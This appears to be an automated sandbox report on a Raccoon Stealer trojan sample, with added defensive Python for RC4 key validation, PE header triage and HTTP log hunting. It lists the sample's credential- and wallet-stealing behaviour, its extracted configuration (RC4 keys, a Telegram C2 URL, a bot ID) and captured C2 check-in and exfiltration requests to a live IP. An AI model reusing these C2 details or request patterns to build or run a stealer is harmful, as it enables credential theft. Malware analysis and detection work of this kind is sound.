Windows Analysis Report 31cGYywxgy

Overview

General Information

Sample Name: 31cGYywxgy (renamed file extension from none to exe)
Analysis ID: 491712
MD5: 7739202a73e3f1c15f5f5e6f82434955
SHA1: cb0d64026ee41d99bf74a1b4939442eb53e4bd84
SHA256: 626999cdbd44d491c59a9fd35b302f3c18d4c0599c08b53b80716661b0e803ff
Tags: 32, exe, trojan

Detection

Raccoon
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Machine Learning detection for sample
Self deletion via cmd delete
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to steal Mail credentials (via file access)
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Is looking for software installed on the system
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Binary contains a suspicious time stamp
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Found malware configuration
Source: 0.2.31cGYywxgy.exe.400000.0.unpack Malware Configuration Extractor: Raccoon Stealer {"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://t.me/agrybirdsgamerept", "Bot ID": "5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4", "RC4_key1": "$Z2s`ten\\@bE9vzR"}
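The configuration above carries two values the extractor labels RC4 keys, a Telegram C2 locator and a bot ID. The page does not say what each key protects, so the usual analyst step is to pull candidate ciphertext out of a process dump and try every key until one yields something URL-shaped. The Python below is an added example of that check, not code from the sample, from Raccoon's authors or from Joe Sandbox: the key strings and URL are copied from the configuration line above (RC4_key1 is taken as the JSON-unescaped value with a single backslash), and the ciphertext is constructed here by encrypting the C2 host seen in the Networking section, so the decrypt is a round trip that exercises the check rather than data recovered from the binary.

```python
"""Validate the RC4 keys from an extracted Raccoon configuration against a
ciphertext blob by trying each key and keeping the candidate whose
plaintext looks like a URL.

Added example; not code from the sample, from Raccoon, or from Joe Sandbox.
The key strings and Telegram URL are copied from the configuration in the
report (RC4_key1 is the JSON-unescaped value, assumed to contain a single
backslash). The ciphertext is CONSTRUCTED below by encrypting the C2
address observed in the report's network traffic, so the decrypt is a
round trip that exercises the check rather than a recovery of data from
the binary."""
import re
from typing import Dict, Optional, Tuple

CONFIG: Dict[str, str] = {
    "RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d",
    "C2 url": "https://t.me/agrybirdsgamerept",
    "Bot ID": "5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4",
    "RC4_key1": "$Z2s`ten\\@bE9vzR",   # one literal backslash after JSON unescaping
}


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA then PRGA). Encrypt and decrypt are the same call."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


URL_RE = re.compile(rb"^https?://[\x21-\x7e]+$")


def looks_like_url(plaintext: bytes) -> bool:
    """Cheap plausibility check: printable ASCII starting with http(s)://."""
    return URL_RE.match(plaintext) is not None


def recover_c2(config: Dict[str, str], blob: bytes) -> Optional[Tuple[str, str]]:
    """Try each key in the config; return (key name, URL) for the first one
    that decrypts to something URL-shaped, or None if neither does."""
    for name in ("RC4_key1", "RC4_key2"):
        plaintext = rc4(config[name].encode("latin-1"), blob)
        if looks_like_url(plaintext):
            return name, plaintext.decode("ascii")
    return None


# CONSTRUCTED ciphertext: the C2 host seen in the traffic section, encrypted
# under RC4_key1. A real blob would come from a memory dump of the process.
SAMPLE_BLOB = rc4(CONFIG["RC4_key1"].encode("latin-1"), b"http://194.180.174.100/")

if __name__ == "__main__":
    print(recover_c2(CONFIG, SAMPLE_BLOB))   # ('RC4_key1', 'http://194.180.174.100/')
```

The URL test is deliberately loose: a wrong RC4 key produces keystream-looking bytes, which will not start with "http", so a false positive needs a near-miraculous collision, while a correct key is recognised regardless of which host the blob encodes.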
Multi AV Scanner detection for submitted file
Source: 31cGYywxgy.exe ReversingLabs: Detection: 40%
Yara detected Raccoon Stealer
Source: Yara match File source: 0.2.31cGYywxgy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.31cGYywxgy.exe.2220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.2120e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.31cGYywxgy.exe.2220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.2120e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.257211865.0000000002220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.282454454.0000000002120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 31cGYywxgy.exe PID: 3104, type: MEMORYSTR
Machine Learning detection for sample
Source: 31cGYywxgy.exe Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0042A130 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree, 0_2_0042A130
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_00429F5D CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree, 0_2_00429F5D
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0040E139 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData, 0_2_0040E139
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_00434A5F lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA, 0_2_00434A5F

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\31cGYywxgy.exe Unpacked PE file: 0.2.31cGYywxgy.exe.400000.0.unpack
Uses 32bit PE files
Source: 31cGYywxgy.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
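The static observations the report makes about the file (32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED, and, further down, no imported functions, non-standard section names and a suspicious time stamp) all come from a handful of header fields. The Python below is an added example of checking them without a third-party parser; it is not Joe Sandbox code and does not parse the real sample. It reads only the MZ stub, the PE32 file header, the import data directory and the section table. The PE bytes it runs on are constructed by build_sample_pe() (the odd section name "xhuv" is invented for the demonstration), and the reference date is the analysis date shown in the report's HTTP Date header.

```python
"""Static PE triage in pure Python for the properties the report flags:
32-bit image, RELOCS_STRIPPED, empty import directory, non-standard
section names and an implausible build timestamp.

Added example; not code from Joe Sandbox or from the sample. It parses
only the headers it needs (MZ, PE32 file header, optional header data
directories, section table). The PE bytes it runs on are CONSTRUCTED by
build_sample_pe(); the reference date is the analysis date shown in the
report's HTTP Date header."""
import struct
from datetime import datetime, timezone
from typing import Dict, List

IMAGE_FILE_RELOCS_STRIPPED = 0x0001
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_32BIT_MACHINE = 0x0100
IMAGE_FILE_MACHINE_I386 = 0x14C
PE32_MAGIC = 0x10B
STANDARD_SECTIONS = {b".text", b".rdata", b".data", b".rsrc", b".reloc",
                     b".idata", b".edata", b".pdata", b".bss", b".tls", b".CRT"}


def parse_pe(data: bytes) -> Dict[str, object]:
    """Pull machine, characteristics, timestamp, import directory and
    section names out of a PE32 image (PE32+ is rejected for brevity)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    nt = struct.unpack_from("<I", data, 0x3C)[0]           # e_lfanew
    if data[nt:nt + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsect, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, nt + 4)
    opt = nt + 24
    if struct.unpack_from("<H", data, opt)[0] != PE32_MAGIC:
        raise ValueError("only PE32 images are handled here")
    # PE32 data directories start at optional-header offset 96; the import
    # table is entry 1 (8 bytes per entry: VirtualAddress, Size).
    imp_rva, imp_size = struct.unpack_from("<II", data, opt + 96 + 8)
    sec_table = opt + opt_size
    sections = [struct.unpack_from("8s", data, sec_table + 40 * i)[0].rstrip(b"\0")
                for i in range(nsect)]
    return {"machine": machine, "characteristics": chars, "timestamp": ts,
            "import_rva": imp_rva, "import_size": imp_size, "sections": sections}


def triage(pe: Dict[str, object], reference_time: datetime) -> List[str]:
    """Return the report-style observations that apply to a parsed image."""
    flags: List[str] = []
    chars = pe["characteristics"]
    if pe["machine"] == IMAGE_FILE_MACHINE_I386 and chars & IMAGE_FILE_32BIT_MACHINE:
        flags.append("32-bit PE")
    if chars & IMAGE_FILE_RELOCS_STRIPPED:
        flags.append("RELOCS_STRIPPED (fixed load address, cannot be relocated)")
    if pe["import_rva"] == 0 or pe["import_size"] == 0:
        flags.append("no import directory (APIs must be resolved at run time)")
    odd = [n for n in pe["sections"] if n not in STANDARD_SECTIONS]
    if odd:
        flags.append("non-standard section names: "
                     + ", ".join(n.decode("ascii", "replace") for n in odd))
    built = datetime.fromtimestamp(pe["timestamp"], tz=timezone.utc)
    if pe["timestamp"] == 0 or built > reference_time:
        flags.append("suspicious timestamp: " + built.isoformat())
    return flags


def build_sample_pe(section_names: List[bytes], characteristics: int, timestamp: int,
                    import_rva: int = 0, import_size: int = 0) -> bytes:
    """CONSTRUCTED minimal PE32 header set: just enough for parse_pe(); it is
    not a loadable executable."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))                 # e_lfanew
    opt = bytearray(224)                                        # PE32 optional header
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 92, 16)                         # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8, import_rva, import_size)
    file_hdr = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, len(section_names),
                           timestamp, 0, 0, len(opt), characteristics)
    sec_table = b"".join(struct.pack("8s32x", n) for n in section_names)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + sec_table


REFERENCE_TIME = datetime(2021, 9, 27, tzinfo=timezone.utc)   # analysis date from the report
# Mirrors the report: 32-bit, relocs stripped, no imports, odd section name, future timestamp.
SAMPLE_PE = build_sample_pe(
    [b".text", b".rsrc", b"xhuv"],
    IMAGE_FILE_32BIT_MACHINE | IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_RELOCS_STRIPPED,
    timestamp=1893456000)                                       # 2030-01-01 UTC

if __name__ == "__main__":
    for line in triage(parse_pe(SAMPLE_PE), REFERENCE_TIME):
        print(line)
```

An empty import directory on an executable that clearly calls Windows APIs (the Cryptography section lists CryptUnprotectData and CredEnumerateW) is the static counterpart of the "Extensive use of GetProcAddress" signature: the real import table only exists after the unpacker has run.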
Source: C:\Users\user\Desktop\31cGYywxgy.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
Source: Binary string: C:\xojine\siyi yovig6.pdb source: 31cGYywxgy.exe
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.0.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: 31cGYywxgy.exe, 00000000.00000002.282980746.000000006E819000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.0.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
Source: Binary string: XC:\xojine\siyi yovig6.pdb source: 31cGYywxgy.exe
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.0.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: 31cGYywxgy.exe, 00000000.00000002.282980746.000000006E819000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.0.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0043EFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 0_2_0043EFDD

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49755 -> 194.180.174.100:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://t.me/agrybirdsgamerept
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: MIVOCLOUDMD MIVOCLOUDMD
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected:
  GET /agrybirdsgamerept HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Content-Type: text/plain; charset=UTF-8
  Host: t.me
Source: global traffic HTTP traffic detected:
  POST / HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Content-Type: text/plain; charset=UTF-8
  Content-Length: 128
  Host: 194.180.174.100
Source: global traffic HTTP traffic detected:
  GET //l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861 HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: 194.180.174.100
Source: global traffic HTTP traffic detected:
  GET //l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16 HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: 194.180.174.100
Source: global traffic HTTP traffic detected:
  POST / HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV
  Content-Length: 1017
  Host: 194.180.174.100
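The requests listed under this signature share a shape that is easy to hunt for in proxy logs: no User-Agent at all, a Host header that is a bare IP (matching the "TCP traffic without corresponding DNS query" entries), a Content-Type header on a GET, a small text/plain POST to the raw IP for the check-in, and a multipart/form-data POST to the same IP for the upload the Snort rule above fired on. The Python below is an added example of that triage, not part of the Joe Sandbox report or any vendor rule set. The request texts are constructed from the request lines shown above (bodies omitted) plus one ordinary browser request as a control; a single indicator is treated as noise and only requests with two or more are reported.

```python
"""Flag HTTP requests that match the traffic pattern in this report: no
User-Agent, a bare-IP Host, Content-Type on a GET, a text/plain POST to a
raw IP (the check-in) and a multipart/form-data POST to a raw IP (the
exfil the Snort rule fired on).

Added example; not part of the Joe Sandbox report or any vendor rule. The
request texts below are CONSTRUCTED from the request lines in the report
(bodies omitted), plus one ordinary browser request as a control."""
import ipaddress
from typing import Dict, List, Tuple

Request = Dict[str, object]


def parse_request(raw: str) -> Request:
    """Split a raw HTTP/1.x request into method, target, lowercase headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def is_bare_ip(host: str) -> bool:
    """True when Host is an IPv4 literal (optionally :port): no DNS lookup preceded it."""
    try:
        ipaddress.IPv4Address(host.split(":")[0])
        return True
    except ValueError:
        return False


def score_request(req: Request) -> List[str]:
    """Return the indicators present in one request; empty list means clean."""
    h: Dict[str, str] = req["headers"]
    host = h.get("host", "")
    ctype = h.get("content-type", "")
    method = req["method"]
    reasons: List[str] = []
    if "user-agent" not in h:
        reasons.append("no User-Agent header")
    if is_bare_ip(host):
        reasons.append("Host is a bare IP literal")
    if method == "GET" and ctype:
        reasons.append("GET carrying a Content-Type header")
    if method == "POST" and ctype.startswith("text/plain") and is_bare_ip(host):
        reasons.append("text/plain POST to a bare IP (check-in shape)")
    if method == "POST" and ctype.startswith("multipart/form-data") and is_bare_ip(host):
        reasons.append("multipart/form-data POST to a bare IP (exfil shape)")
    if req["target"].startswith("//"):
        reasons.append("request target begins with a double slash")
    return reasons


def hunt(raw_requests: List[str], min_reasons: int = 2) -> List[Tuple[str, str, str, List[str]]]:
    """Return (method, host, target, reasons) for requests with at least
    min_reasons indicators; one indicator on its own is too noisy to page on."""
    hits = []
    for raw in raw_requests:
        req = parse_request(raw)
        reasons = score_request(req)
        if len(reasons) >= min_reasons:
            hits.append((req["method"], req["headers"].get("host", ""), req["target"], reasons))
    return hits


COMMON = "Cache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\n"
# CONSTRUCTED from the request lines in this report; bodies omitted.
SAMPLE_REQUESTS = [
    "GET /agrybirdsgamerept HTTP/1.1\r\n" + COMMON
    + "Content-Type: text/plain; charset=UTF-8\r\nHost: t.me\r\n\r\n",
    "POST / HTTP/1.1\r\n" + COMMON
    + "Content-Type: text/plain; charset=UTF-8\r\nContent-Length: 128\r\nHost: 194.180.174.100\r\n\r\n",
    "GET //l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861 HTTP/1.1\r\n"
    + COMMON + "Host: 194.180.174.100\r\n\r\n",
    "POST / HTTP/1.1\r\n" + COMMON
    + "Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV\r\n"
    + "Content-Length: 1017\r\nHost: 194.180.174.100\r\n\r\n",
    # control: an ordinary browser request, should not be reported
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    + "User-Agent: Mozilla/5.0\r\nAccept: */*\r\n\r\n",
]

if __name__ == "__main__":
    for method, host, target, reasons in hunt(SAMPLE_REQUESTS):
        print(f"{method} {host}{target}: {'; '.join(reasons)}")
```

The Telegram request is the one worth keeping in a hunt even though its host is a real name: a GET to t.me with a Content-Type header and no User-Agent does not come from a browser, and it precedes the bare-IP traffic by design, since the channel page is where the sample learns the IP.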
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 194.180.174.100 194.180.174.100
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: global traffic HTTP traffic detected:
  HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 27 Sep 2021 18:31:43 GMT
  Content-Type: application/octet-stream
  Content-Length: 2828315
  Connection: keep-alive
  Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT
  ETag: "612fa893-2b281b"
  Accept-Ranges: bytes
